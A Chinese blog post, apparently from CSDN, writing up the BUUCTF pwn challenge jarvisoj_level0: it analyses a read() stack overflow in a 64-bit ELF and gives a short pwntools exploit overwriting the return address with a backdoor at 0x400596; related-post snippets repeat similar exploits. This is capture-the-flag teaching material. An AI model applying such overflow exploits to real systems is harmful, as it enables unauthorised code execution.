BUUCTF-PWN-jarvisoj_level0

最新推荐文章于 2025-02-18 15:53:11 发布

原创最新推荐文章于 2025-02-18 15:53:11 发布 · 221 阅读

0 ·

CC 4.0 BY-SA版权

CTF 同时被 2 个专栏收录

28 篇文章

订阅专栏

pwn

7 篇文章

订阅专栏

本文介绍了一种64位ELF文件中典型read()函数栈溢出漏洞的利用方法。通过分析main()函数及vulnerable_function()函数,确定了payload长度为0x80+8,并使用p64填充以调用system函数。

文章目录

查看文件信息

64位elf文件
在这里插入图片描述

IDA 分析

我们来到main()函数
在这里插入图片描述
再进入vulnerable_function()函数

典型的read()栈溢出漏洞,buf有0x80 [rbp + 80h] 所以如果要覆盖的话需要0x80 + rbp本身的8字节

同时我们发现 callsystem函数地址为 0x400596，所以payload = ‘a’ * (0x80 + 8) + p64(0x400596)

在这里插入图片描述

exp

from pwn import *

p = remote('node3.buuoj.cn',27954)

payload = 'a' * (0x80 + 8) + p64(0x400596)

p.sendline(payload)

p.interactive()

确定要放弃本次机会？

福利倒计时

: :

立减 ¥

普通VIP年卡可用

立即使用

Persistent_s

关注关注

0
点赞
踩
0

收藏

觉得还不错? 一键收藏
0
评论
分享

复制链接

分享到 QQ

分享到新浪微博

扫一扫
举报

举报

专栏目录

CTF buuoj pwn-----第6题:jarvisoj_level0

bing_Max的博客

09-02

1198

CTF buuoj pwn-----第6题:ciscn_2019_n_1前言一、checksec 检测文件的保护机制二. 静态分析，IDA打开文件三. 编写EXP四. 运行EXP, 获取flag 前言记录一下pwn的过程, 新手学习日记, 流水线记录. 打开题目, 连接靶机，下载文件level0 一、checksec 检测文件的保护机制 bing@bing-virtual-machine:~/pwn$ checksec ./level0 [*] '/home/bing/pwn/level0'

[buuctf]jarvisoj_level0

逆向萌新的博客

05-30

626

[buuctf]jarvisoj_level0

参与评论您还未登录，请先登录后发表或查看评论

【BUUCTF - PWN】jarvisoj_level0

古月浪子的博客

04-05

811

checksec一下，栈溢出 IDA打开看看，很明显的溢出和后门函数，一道白给题 from pwn import * from LibcSearcher import * context.os='linux' context.arch='amd64' context.log_level='debug' sl=lambda x:io.sendline(x) rl=lambda :io.rec...

[BUUCTF]PWN8——jarvisoj_level0

mcmuyanga的博客

08-26

683

[BUUCTF]PWN8——jarvisoj_level0 题目网址：https://buuoj.cn/challenges#jarvisoj_level0 步骤：例行检查，64位，开启了NX保护 nc一下，看看程序的大概执行流程，回显Hello，world之后让我们输入用64位ida打开，shift+f12查看字符串，发现了 system 和 /bin/sh 双击跟进，ctrl+x找到调用 /bin/sh 的函数，找到了程序里的后门，shell_addr=0x400596 根据

[BUUCTF]PWN------jarvisoj_level0

BangSen1的博客

01-18

418

jarvisoj_level0 例行检查，64bit，开启NX保护。 nc一下，出现了Hello world,接着让我们输入，没有有用的信息。 ‘用IDA打开，看到了/bin/sh 双击跟进，Ctrl+x查看被什么调用，找到了后门，所以shell_addr=0x400596 查看主函数，寻找输入点。可以看到buf的大小是0x80，但它读取时只读了0x20，可以溢出，覆盖返回地址为后门地址既可 exp flag ...

buuctf-jarvisoj_level0(pwn)题解

最新发布

2301_81574836的博客

02-18

603

buuctf-jarvisoj_level0(pwn)题解

BUUCTF-PWN题详解（pwn1_sctf_2016 1&jarvisoj_level0 1）

2302_80325559的博客

11-27

2683

今天给大家介绍了几个危险函数strcpy、read，以及Python pwn模块的一些函数用法。这几天也做了这六道溢出的题，思路大差不差，都是先找从哪儿溢出，然后后门的地址。如果大家可以自己独立做出来的话，就可以说只要以后见到这种题，分分钟拿下。后面的题就不会留这么明显的后门给我们了，会让我们自己创建后门，难度会大一点点。我尽量以简洁的语言给大家说清楚，大家一起加油！

【BUUCTF-PWN】13-jarvisoj_level2_x64

燕麦葡萄干的博客

07-05

794

ret指令的地址，再接着是’/bin/sh’字符串的地址，最后是system()函数的地址。ret处，该指令会将当前栈顶的元素（‘/bin/sh’字符串的地址）出栈并存入rdi中，并返回到下一条指令处。此时栈中就只有system()函数的地址了，所以下一条指令正是system()，而它需要的参数正好就在rdi寄存器中，这样就执行了system(’/bin/sh’)现在只需要让函数返回到system，并传入参数“/bin/sh”就可以了。32位的比较简单，只需要返回地址+下一次的返回地址+参数1+参数2+…

【BUUCTF-PWN】8-jarvisoj_level2

燕麦葡萄干的博客

07-05

471

32位的分布是：返回地址+下一次的返回地址+参数1+参数2+…这里没有可以直接利用的后门函数，所以需要构造 system（/bin/sh）去执行。system的地址还不是0x0804A038，而是0x08048320。查看vulnerable_function()函数。需要找不是extern的system函数。/bin/sh的地址0x0804A024。read()函数存在缓冲区溢出漏洞。32位，开启了NX保护。

[BUUCTF-pwn]——jarvisoj_level0

Y_peak的博客

01-31

2773

[BUUCTF-pwn]——jarvisoj_level0 题目地址：https://buuoj.cn/challenges#jarvisoj_level0 题目：还是先下载下来在Linux上checksex一下，基本确实又是栈溢出了。 64位，所以我们用64位的IDA打开，没什么有用的信息，点开vulnerable_function函数发现栈溢出的read函数，前面为0意味着标准读入，后面的长度也可以。没毛病就是这个地方了。再翻翻其他函数，发现了我们想要的system函数。找到位置，和需要覆

buuctf之jarvisoj_level0

weixin_54452942的博客

03-28

1757

64位(system_addr+1)的奥秘

buuctf jarvisoj_level0

carol2358的博客

04-17

719

栈溢出，然后覆盖返回地址为system的地址。 from pwn import * from LibcSearcher import * context.os='linux' context.arch='amd64' context.log_level='debug' ru=lambda x:io.recvuntil(x) rl=lambda :io.recvline() ...

[每日一PWN]BUUCTF jarvisoj_level0

qq_55233040的博客

11-23

262

依旧是基础的ret2text。

BUUCTF jarvisoj_level0

m0_54262894的博客

10-27

421

先checksec，仅开启了NX保护运行一下放入ida中查看main函数没有什么关键信息，双击vulnerable_function() 在这里我们看到了漏洞 buf定义了80个字节，而我们可以输入更多的数据接着找找后门函数这道题很简单，已经把后门给我们展示出来了记住后门函数的地址0x400596 做完以上步骤我们就有思路了：覆盖buf 的80个字节因为是64位的文件，然后再加8个字节...

BUUCTF-Pwn-jarvisoj_level0

餐桌上的猫

02-12

405

题目截图 panyload=b’b’*(0x80+8)+p64(0x400596)

【BUUCTF-PWN】6-jarvisoj_level0

燕麦葡萄干的博客

07-05

331

buf变量长度为128，但是read可以读入0x200长度的字符，存在栈溢出，需要覆盖的长度为0x80+8。vulnerable_function()函数。64位，开启了NX保护。

jarvisoj_level1

08-28

很抱歉，我无法回答这个问题。123 #### 引用[.reference_title] - *1* *3* [[BUUCTF-pwn]——jarvisoj_level1](https://blog.youkuaiyun.com/Y_peak/article/details/114916604)[target="_blank" data-report-click={"spm":"1018.2226.3001.9630","extra":{"utm_source":"vip_chatgpt_common_search_pc_result","utm_medium":"distribute.pc_search_result.none-task-cask-2~all~insert_cask~default-1-null.142^v93^chatsearchT3_1"}}] [.reference_item style="max-width: 50%"] - *2* [个人网站大总结合集—持续更新，欢迎共享，不要白嫖哦](https://download.youkuaiyun.com/download/weixin_38708461/14885161)[target="_blank" data-report-click={"spm":"1018.2226.3001.9630","extra":{"utm_source":"vip_chatgpt_common_search_pc_result","utm_medium":"distribute.pc_search_result.none-task-cask-2~all~insert_cask~default-1-null.142^v93^chatsearchT3_1"}}] [.reference_item style="max-width: 50%"] [ .reference_list ]